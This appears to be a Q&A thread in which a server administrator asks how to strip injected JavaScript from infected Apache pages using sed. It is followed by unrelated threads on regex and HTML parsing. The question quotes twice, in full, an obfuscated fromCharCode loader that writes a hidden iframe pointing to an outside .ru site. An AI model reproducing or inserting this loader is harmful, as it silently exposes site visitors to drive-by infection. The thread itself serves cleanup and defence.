sed multiline replace HTML with javascript malicious code - regex

I have an Apache server that has been infected with pieces of malicious JavaScript code intended to infect the computers that visit the web page.
What I'm trying to do is remove these pieces of malicious code using the find and sed commands on a Linux server.
I have created a regular expression for sed that matches almost everything except the "</script>" end tag. It is on a new line and I can't find a way to match it as well.
The malicious code is:
<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String.fromCharCode(97)+String.fromCharCode(108)+Stri
ng.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }
</script>
Author's note: after posting the question, I can see that the web formatting cuts off the previous sample. To see the full sample of the malicious JavaScript code, look at the non-bold text in the command below and append a new line and a "</script>" HTML tag to it.
The regular expression that works for all of the text except the final "</script>" is:
**find /root/cambios -type f -exec sed -i 's#**<script>if (i5463 == null) { var i5463 = 1; var vst = String.fromCharCode(68)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101); window.status=vst; document.write(String.fromCharCode(60)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(32)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(61)+String.fromCharCode(99)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(121)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(83)+String.fromCharCode(80)+String.fromCharCode(76)+String.fromCharCode(65)+String.fromCharCode(89)+String.fromCharCode(58)+String.fromCharCode(32)+String.fromCharCode(110)+String.fromCharCode(111)+String.fromCharCode(110)+String.fromCharCode(101)+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(34)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(48)+String.fromCharCode(46)+String.fromCharCode(119)+String.fromCharCode(101)+String.fromCharCode(98)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(116)+String.fromCharCode(97)+String.fromCharCode(110)+String
.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(121)+String.fromCharCode(122)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(46)+String.fromCharCode(114)+String.fromCharCode(117)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(110)+String.fromCharCode(100)+String.fromCharCode(101)+String.fromCharCode(120)+String.fromCharCode(46)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(109)+String.fromCharCode(108)+String.fromCharCode(63)+String.fromCharCode(112)+String.fromCharCode(61)+String.fromCharCode(50)+String.fromCharCode(51)+String.fromCharCode(54)+String.fromCharCode(55)+String.fromCharCode(54)+String.fromCharCode(56)+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(119)+String.fromCharCode(105)+String.fromCharCode(100)+String.fromCharCode(116)+String.fromCharCode(104)+String.fromCharCode(61)+String.fromCharCode(34)+screen.width+String.fromCharCode(34)+String.fromCharCode(32)+String.fromCharCode(104)+String.fromCharCode(101)+String.fromCharCode(105)+String.fromCharCode(103)+String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(61)+String.fromCharCode(34)+screen.height+String.fromCharCode(34)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(105)+String.fromCharCode(102)+String.fromCharCode(114)+String.fromCharCode(97)+String.fromCharCode(109)+String.fromCharCode(101)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(68)+String.fromCharCode(73)+String.fromCharCode(86)+String.fromCharCode(62)); window.status=vst; }**##g' {} \;**
So, can anyone please help me match the new line and the "</script>" text?
Thank you in advance.

Indeed, you shouldn't use regex for this task. As has been said many times on SO, regular expressions are not the proper tool for manipulating HTML, because HTML is not a regular language. Your best bet is to use an HTML parser. For instance, the following unoptimized (but still simple) code uses Jsoup to achieve your goal:
import org.jsoup.Jsoup;
import org.jsoup.nodes.DataNode;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.nodes.Node;
import org.jsoup.select.Elements;
public class RemoveScript {
    public static void main(String[] args) {
        String viralContent = "Your viral content";
        String inputText = "<html><head><script>" + viralContent + "</script></head><body></body></html>";
        Document doc = Jsoup.parse(inputText);
        Elements scripts = doc.select("script");
        for (Element element : scripts) {
            for (Node child : element.childNodes()) {
                if (child instanceof DataNode) {
                    String content = ((DataNode) child).getWholeData();
                    if (content.equals(viralContent)) {
                        element.remove();
                    }
                }
            }
        }
        System.out.println(doc.toString());
    }
}
I'm sure other parsers can do the same very easily too.
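Since the injected block in the question is a fixed, known string, another option is to skip regex entirely and remove it as a literal. sed works line by line by default, which is why a closing tag on its own line is never seen by a single-line pattern; treating the whole file content as one string avoids that. A minimal sketch in JavaScript, where `stripBlock` is a hypothetical helper name and `payload` is a shortened stand-in for the real block (reading and writing the files is left out):

```javascript
// Remove every literal occurrence of `block` from `content`.
// No regular expression is involved, so nothing in the payload needs escaping.
function stripBlock(content, block) {
  return content.split(block).join("");
}

// Shortened stand-in for the real payload; note the newline before </script>.
const payload = "<script>if (i5463 == null) { var i5463 = 1; /* ... */ }\n</script>";

const infected = "<html><body><p>hello</p>" + payload + "</body></html>";
const cleaned = stripBlock(infected, payload);

console.log(cleaned);
```

Files saved with Windows line endings would have "\r\n" before the closing tag, so the literal would need to cover that variant as well.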

Related

regex.exec not able to extract table from email body

I have an email body containing a table whose first (leftmost) column has the heading "Client Time".
I want to extract the whole table, but I get null from the following exec call.
let regex = /<tr><td><b>Client Time([\S\s]+)<table/;
Logger.log(regex.exec(tempbody));
Here is the rest of the code, which should be fine.
if ((table = regex.exec(tempbody)) !== null) {
  row_regex = new RegExp(/<tr>(.+)<\/tr>/g);
  let data, tempdata, rows, cell;
  Logger.log(data);
  while ((rows = row_regex.exec(table[1])) !== null) {
    data = []
    cell_regex = new RegExp(/<td.*?>(.+?)<\/td>/g);
    while ((cell = cell_regex.exec(rows[1])) !== null) {
      data.push(cell[1]);
    }
    if (!tempdata || (tempdata && tempdata.length === data.length)) {
      sheet.appendRow(data);
    }
    tempdata = data;
  }
  inProcessLabel.removeFromThread(threads[i]);
}
What change do I need to make to the regex? Sorry, I don't understand regular expressions well, but I believe this same code worked for me in the past.
Using regular expressions to parse HTML is not a good idea (for a number of reasons).
We have V8 now, so you can simply add a proper HTML/XML parser library (written in pure JavaScript with minimal dependencies) to your Apps Script project. Just get the library source in full or minified form and add it as its own script file.
Here are a few good options:
XPath (source: full | minified)
HTMLParser2-20KB (source: minified)
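If you do stay with regex for a quick fix, one plausible reason for the null result is that the markup no longer matches the pattern character for character, for example because a tag gained an attribute or because no "<table" follows the row. This is only an assumption, since the actual email body is not shown. A sketch with a made-up `body` and a hypothetical `extractRows` helper, still regex-based and therefore fragile compared to a parser:

```javascript
// Assumed sample body: one cell carries an attribute and rows are separated by newlines.
const body = [
  '<p>Report</p>',
  '<table border="1">',
  '<tr><td style="width:50%"><b>Client Time</b></td><td>10:00</td></tr>',
  '<tr><td><b>Server Time</b></td><td>10:05</td></tr>',
  '</table>',
].join("\n");

// The pattern from the question: needs the exact text "<tr><td><b>" and a later "<table".
const strict = /<tr><td><b>Client Time([\S\s]+)<table/;

// A more tolerant variant: optional attributes and whitespace, lazy match up to "</table".
const tolerant = /(<tr[^>]*>\s*<td[^>]*>\s*<b>\s*Client Time[\s\S]+?)<\/table/i;

function extractRows(html) {
  const found = tolerant.exec(html);
  if (found === null) return [];
  const rows = [];
  for (const row of found[1].matchAll(/<tr[^>]*>([\s\S]*?)<\/tr>/g)) {
    const cells = [];
    for (const cell of row[1].matchAll(/<td[^>]*>([\s\S]*?)<\/td>/g)) {
      // Drop inline tags such as <b> and surrounding whitespace.
      cells.push(cell[1].replace(/<[^>]+>/g, "").trim());
    }
    rows.push(cells);
  }
  return rows;
}

console.log(strict.exec(body));
console.log(extractRows(body));
```

Note that `[\s\S]*?` is used instead of `.+` inside rows and cells, because `.` does not match line breaks by default.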

Google App Script findText regex not working for new line character

I'm trying to locate and modify text in my Google Document where the text is broken across a full line break. My regular expression below works when I search the document manually (CTRL+F) using the regular expression dialog. What baffles me is why the exact same regex doesn't work in the code below on full line breaks, i.e. "\n" (note: soft line breaks, "\v", are OK).
The second approach finds the text, but I can't do anything with it because I need the element object in order to manipulate the text.
//Test document 1Q6v8ipqA81LoPtpk71NdqTaIEqMjki1KIJbrm0bILBg contains the following text:
//
//This Agreement shall not be assigned by either party without the prior\n
//written consent of the parties hereto
var doc = DocumentApp.openById('1Q6v8ipqA81LoPtpk71NdqTaIEqMjki1KIJbrm0bILBg');
//Method 1 - does NOT locate the text
var body = doc.getBody();
var pattern = "prior[\s]*written";
var foundElement = body.findText(pattern);
while (foundElement != null) {
  var foundText = foundElement.getElement().asText();
  var start = foundElement.getStartOffset();
  var end = foundElement.getEndOffsetInclusive();
  foundElement = body.findText(pattern, foundElement);
}
//Method 2 - locates the text, but I cannot acquire the element object
var body2 = doc.getBody().getText();
//the g flag lets exec() advance through the text instead of returning the first match forever
var pattern2 = /prior[\s]*written/g;
var m;
while ((m = pattern2.exec(body2)) !== null) {
  Logger.log(m[0]);
}
If this were ever going to work, you would need the regex to be in s (single line) mode. Per https://developers.google.com/apps-script/reference/document/body#findtextsearchpattern,
A subset of the JavaScript regular expression features are not fully supported, such as capture groups and mode modifiers.
So it looks like they have in fact chosen not to support multi-line matches in any way.
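Separately from that limitation, it may be worth checking how the pattern string in Method 1 is built. In a JavaScript string literal, "\s" is not a recognized escape and collapses to a plain "s", so the pattern passed along is "prior[s]*written". The sketch below shows only this plain JavaScript behavior with a made-up `text`; it does not call findText and says nothing about whether findText can match across a paragraph break:

```javascript
const text = "without the prior\nwritten consent";

// In a string literal, "\s" is an unrecognized escape and collapses to plain "s".
const fromString = "prior[\s]*written";
console.log(fromString); // prior[s]*written

// Doubling the backslash keeps the \s class intact in the resulting pattern.
const escaped = "prior[\\s]*written";

console.log(new RegExp(fromString).test(text)); // false
console.log(new RegExp(escaped).test(text));    // true
```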

Regex to replace domain within links that are not images

I need to replace a domain name in all the links on the page that do not point to images or PDF files.
This would be a full HTML page received through a proxy service.
Example:
test<img src="http://www.test.com" /><a href="http://www.test.com/test.pdf">pdf
test1
Result:
test<img src="http://www.test.com" /><a href="http://www.test.com/test.pdf">pdf
test1
If you are using .NET, I strongly suggest using HTML Agility Pack.
Direct parsing using regex can be very error-prone. This question is also similar to the post below.
What regex should I use to remove links from HTML code in C#?
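If the domain is http://www.example.com, the following should do the trick on engines that support lookbehind:
/http:\/\/www\.example\.com\S*(?<!pdf|jpg|png|gif)\s/
This uses a negative lookbehind placed just before the trailing whitespace, so the regex matches a URL only if it does not end in pdf, jpg, png or gif. A negative lookahead at that same position would inspect the whitespace character itself and therefore never reject anything.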
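The position of the negative assertion matters here. A sketch comparing a lookahead and a lookbehind placed directly before the trailing `\s`, assuming an engine with lookbehind support (such as V8) and made-up sample strings:

```javascript
// Lookahead before \s: it looks at the whitespace itself, so it can never reject.
const lookahead = /http:\/\/www\.example\.com\S*(?!pdf|jpg|png|gif)\s/;

// Lookbehind before \s: it looks at the last three characters of the URL.
const lookbehind = /http:\/\/www\.example\.com\S*(?<!pdf|jpg|png|gif)\s/;

const pdfLink = "see http://www.example.com/files/test.pdf for details";
const pageLink = "see http://www.example.com/about.html for details";

console.log(lookahead.test(pdfLink));   // true
console.log(lookbehind.test(pdfLink));  // false
console.log(lookbehind.test(pageLink)); // true
```

Both patterns still require whitespace after the URL, so a URL followed directly by a quote or an angle bracket, as in an href attribute, is not matched by either.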
If none of your pdf urls have query parameters (like a.pdf?asd=12), the following code will work. It replaces only absolute and root-relative urls.
var links = document.getElementsByTagName("a");
var len = links.length;
var newDomain = "http://mydomain.com";
/**
 * Match absolute urls (starting with http)
 * and root relative urls (starting with a `/`)
 * Does not match relative urls like "subfolder/anotherpage.html"
 */
var regex = new RegExp("^(?:https?://[^/]+)?(/.*)$", "i");
//uncomment next line if you want to replace only absolute urls
//regex = new RegExp("^https?://[^/]+(/.*)$", "i");
for (var i = 0; i < len; i++) {
  var link = links.item(i);
  var href = link.getAttribute("href");
  if (!href) //in case of named anchors
    continue;
  if (href.match(/\.pdf$/i)) //if pdf
    continue;
  href = href.replace(regex, newDomain + "$1");
  link.setAttribute("href", href);
}
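If some PDF or image URLs do carry query parameters, one way around the caveat is to test the extension on the parsed path instead of the raw href. A rough sketch using the standard `URL` class; `rewriteHref` and `SKIP_EXTENSIONS` are hypothetical names, and the extension list is an assumption:

```javascript
// Extensions that should keep their original domain (assumed list).
const SKIP_EXTENSIONS = /\.(?:pdf|jpe?g|png|gif)$/i;

// Hypothetical helper: returns the href with its origin replaced by newOrigin,
// unless the link is relative, unparseable, or points to a skipped file type.
function rewriteHref(href, newOrigin) {
  // Only absolute http(s) URLs and root-relative URLs are touched.
  if (!/^(?:https?:\/\/|\/)/i.test(href)) return href;
  let url;
  try {
    // The base is only used to resolve root-relative hrefs such as "/about".
    url = new URL(href, newOrigin);
  } catch (e) {
    return href;
  }
  // pathname excludes the query string, so "a.pdf?asd=12" is still recognized.
  if (SKIP_EXTENSIONS.test(url.pathname)) return href;
  return newOrigin + url.pathname + url.search + url.hash;
}

console.log(rewriteHref("http://www.test.com/test.pdf?asd=12", "http://mydomain.com"));
console.log(rewriteHref("http://www.test.com/page.html?x=1#top", "http://mydomain.com"));
console.log(rewriteHref("/about", "http://mydomain.com"));
```

In the loop above, this could stand in for the `href.match` check and the `href.replace` call.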

How do I linkify text using ActionScript 3

I have a text that I want to linkify (identify URLs and convert them to HTML links). The text could be multi-line, and could contain multiple urls like the example below.
My current ActionScript code looks like this:
<mx:Script>
<![CDATA[
import mx.controls.Alert;
import mx.rpc.events.FaultEvent;
import mx.rpc.events.ResultEvent;
private function init():void {
var str:String = "#stack the website for google is http://www.google.com and gmail is http://gmail.com";
//Alert.show(linkify(str),"Error");
txtStatus.htmlText = linkify(str);
}
private function linkify(texty:String):String {
//return texty.replace("/[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g",function(m):String { return m.linkify(m);});
//return texty.replace(/[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g, function(m):String {return m.linkify(m);}).replace(/(^|[^\w])(#[\d\w\-]+)/g, function(m2):String{return '#' + m2.substr(1) + ''; });
var pattern:RegExp = /[A-Za-z]+:\/\/[A-Za-z0-9-_]+\.[A-Za-z0-9-_:%&\?\/.=]+/g;
var match:String = pattern.exec(texty);
return texty.replace(pattern,'<a href="' + match + '">' +
match + '</a>');
}
]]>
</mx:Script>
The problem with the above script is that it takes only the first match and uses it for every replacement. Also, how do I do it for #?
Any help is highly appreciated.
ooph ... why does everybody use regex these days, to accomplish super simple tasks? also, you forgot, that "+" is a valid character for URLs, as a replacement for space, and even an awful lot of other characters may be used, so your pattern would not even match accordingly ...
well, anyway, have a look at AS3 regex metacharacters ...
that'll GREATLY improve your expression's readability and is much more robust...
i'd go with something like this, really:
var r:RegExp = /(?:http|https):\/\/\S*/g;
trace(str.replace(r, function (s:String, ...rest):String {
    return '<a href="' + s + '">' + s + '</a>';
}));
but the actual point, was the global flag ...
good luck then ... :)
greetz
back2dos
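The same idea, a global pattern plus a replacement function that receives each match, can be sketched in JavaScript, whose `replace` behaves much like the AS3 one here. The hashtag part is only a guess at what "#" should link to: `tagBase` is a hypothetical URL prefix, not something from the question.

```javascript
// Hypothetical prefix for hashtag links; replace with whatever the tags should point to.
const tagBase = "https://example.com/tags/";

function linkify(text) {
  // Alternative 1: a URL. Alternative 2: a #tag at the start or after whitespace.
  const pattern = /(https?:\/\/\S+)|(^|\s)#([\w-]+)/g;
  return text.replace(pattern, (match, url, lead, tag) => {
    if (url !== undefined) {
      // Each match gets its own link, instead of reusing the first one.
      return '<a href="' + url + '">' + url + '</a>';
    }
    return lead + '<a href="' + tagBase + tag + '">#' + tag + '</a>';
  });
}

const str = "#stack the website for google is http://www.google.com and gmail is http://gmail.com";
console.log(linkify(str));
```

Since `\S+` is greedy, punctuation directly after a URL (a trailing period or comma) ends up inside the link, which may or may not be acceptable.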

How do I extract HTML img sources with a regular expression?

I need to extract the src attribute from all image tags in an HTML document.
So, the input is an HTML page and the output would be a list of URLs pointing to images:
e.g. http://www.google.com/intl/en_ALL/images/logo.gif
The following is what I came up with so far:
<img\s+src=""(http://.*?)
This does not work for tags where the src isn't directly after the img tag, for example:
<img height="1px" src="spacer.gif">
Can someone help complete this regular expression? It's pretty easy, but I thought this may be a faster way to get an answer.
The following regexp snippet should work.
<img[^>]+src="([^">]+)"
It looks for text that starts with <img, followed by one or more characters that are not >, then src=". It then grabs everything between that point and the next " or >.
But if at all possible, use a real HTML parser. It's more solid, and will handle edge cases much better.
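A quick way to try the pattern is to run it globally and collect the first capture group. A sketch in JavaScript with a made-up `html` sample; `extractImgSrc` is a hypothetical helper name:

```javascript
// Collect the src value of every <img> tag that uses double quotes.
function extractImgSrc(html) {
  const pattern = /<img[^>]+src="([^">]+)"/g;
  return Array.from(html.matchAll(pattern), (m) => m[1]);
}

const html =
  '<img height="1px" src="spacer.gif"><p>text</p>' +
  '<img src="http://www.google.com/intl/en_ALL/images/logo.gif" alt="logo">';

console.log(extractImgSrc(html));

// One of the edge cases a parser would handle: single-quoted attributes are missed.
console.log(extractImgSrc("<img src='a.png'>"));
```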
You don't want to do that. Correctly parsing HTML is a very complex problem, and regular expressions are not a good tool for that.
See e.g.
Can you provide some examples of why it is hard to parse XML and HTML with a regex?
And here for a good solution:
How do I programatically inspect a HTML document
You could do this pretty easily with JavaScript. An example is below:
var images = document.getElementsByTagName("img");
for (var i = 0; i < images.length; i++) {
  // get image src
  var currImage = images[i].src;
  // do link creation here
}
This works great for me:
$regexp = '<img[^>]+src=(?:\"|\')\K(.[^">]+?)(?=\"|\')';
if (preg_match_all("/$regexp/", $content, $matches, PREG_SET_ORDER)) {
    if (!empty($matches)) {
        // use < rather than <= so the loop stays within the bounds of $matches
        for ($i = 0; $i < count($matches); $i++) {
            $img_src = $matches[$i][0];
            echo $img_src;
        }
    }
}